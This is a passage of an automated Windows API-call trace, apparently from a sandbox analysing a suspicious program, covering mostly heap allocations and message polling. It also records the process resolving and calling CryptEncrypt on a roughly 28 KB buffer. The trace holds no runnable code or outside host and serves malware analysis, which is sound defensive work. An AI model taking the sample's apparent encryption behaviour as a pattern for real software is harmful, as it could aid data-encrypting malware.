lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0228.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0228.983] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0228.983] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0228.983] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0228.983] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0228.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0228.983] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0228.983] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0228.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04070 | out: hHeap=0x970000) returned 1 [0228.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0228.983] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0228.984] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0228.984] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0228.984] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51508, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0228.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0228.984] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0228.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0228.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0228.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e7f5d0 [0228.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0228.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0228.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0228.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0228.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0228.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0228.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552c8 [0228.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0228.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0228.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0228.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0228.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0228.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0228.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552c8 | out: hHeap=0x970000) returned 1 [0228.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5d0 | out: hHeap=0x970000) returned 1 [0228.985] CryptEncrypt (in: hKey=0xa87310, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x7028, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x7030) returned 1 [0228.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0228.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5d0 [0228.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552f8 [0228.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0228.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0228.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0228.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55128 [0228.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0228.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55128 | out: hHeap=0x970000) returned 1 [0228.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0228.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0228.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0228.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0228.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55308 [0228.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0228.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55308 | out: hHeap=0x970000) returned 1 [0228.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0228.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0228.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0228.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0228.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55278 [0228.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0228.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55278 | out: hHeap=0x970000) returned 1 [0228.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0228.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0228.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0228.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0228.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55228 [0228.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0228.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55228 | out: hHeap=0x970000) returned 1 [0228.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0228.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0228.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0228.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0228.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55278 [0228.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0228.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55278 | out: hHeap=0x970000) returned 1 [0228.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0228.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0228.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0228.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0228.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552a8 [0228.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0228.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552a8 | out: hHeap=0x970000) returned 1 [0228.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0228.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0228.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0228.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0228.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55298 [0228.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0228.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55298 | out: hHeap=0x970000) returned 1 [0228.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0228.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0228.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0228.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0228.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552b8 [0228.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0228.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552b8 | out: hHeap=0x970000) returned 1 [0228.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0228.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0228.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0228.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0228.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0228.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0228.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0228.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0228.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5a8 | out: hHeap=0x970000) returned 1 [0228.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0228.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0228.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0228.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0228.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0228.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0228.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0228.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0228.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0228.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0228.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0228.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0228.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0228.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0228.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0228.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0228.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0228.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0228.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0228.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0228.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0228.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0228.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0228.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0228.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0228.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0228.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0228.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0228.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf7e08 | out: hHeap=0x970000) returned 1 [0228.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0228.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0228.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0228.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0228.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0228.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0228.989] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0228.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0228.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0228.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0228.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0228.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0228.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0228.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0228.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0228.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0228.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0228.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0228.989] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0228.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0228.989] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0228.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0228.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0228.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0228.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0228.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0228.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0228.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0228.994] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0228.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0228.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0228.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0228.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0228.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0228.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0228.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0228.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0228.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0228.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0228.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0228.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3c8 [0228.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0228.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0228.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0228.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0228.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0228.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0228.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0228.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0228.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b48 [0228.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0228.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5a8 [0228.995] CharLowerBuffW (in: lpsz="byte[28720]", cchLength=0xb | out: lpsz="byte[28720]") returned 0xb [0228.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0228.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0228.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0228.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0228.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0228.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0228.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0228.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0228.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0228.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0228.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0228.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0228.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0228.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0228.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0228.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0228.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x7030) returned 0x2f22878 [0228.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5a8 | out: hHeap=0x970000) returned 1 [0228.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0228.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3c8 | out: hHeap=0x970000) returned 1 [0228.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0228.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0228.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0228.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0228.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0228.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0228.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0228.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0228.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b68 [0228.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977a28 [0228.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0228.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0228.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0228.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0228.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0228.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0228.997] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0228.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0228.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0228.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0228.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0228.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977bd8 [0228.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0228.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0228.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0228.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0228.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0228.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0228.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0228.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0228.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0228.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x7028) returned 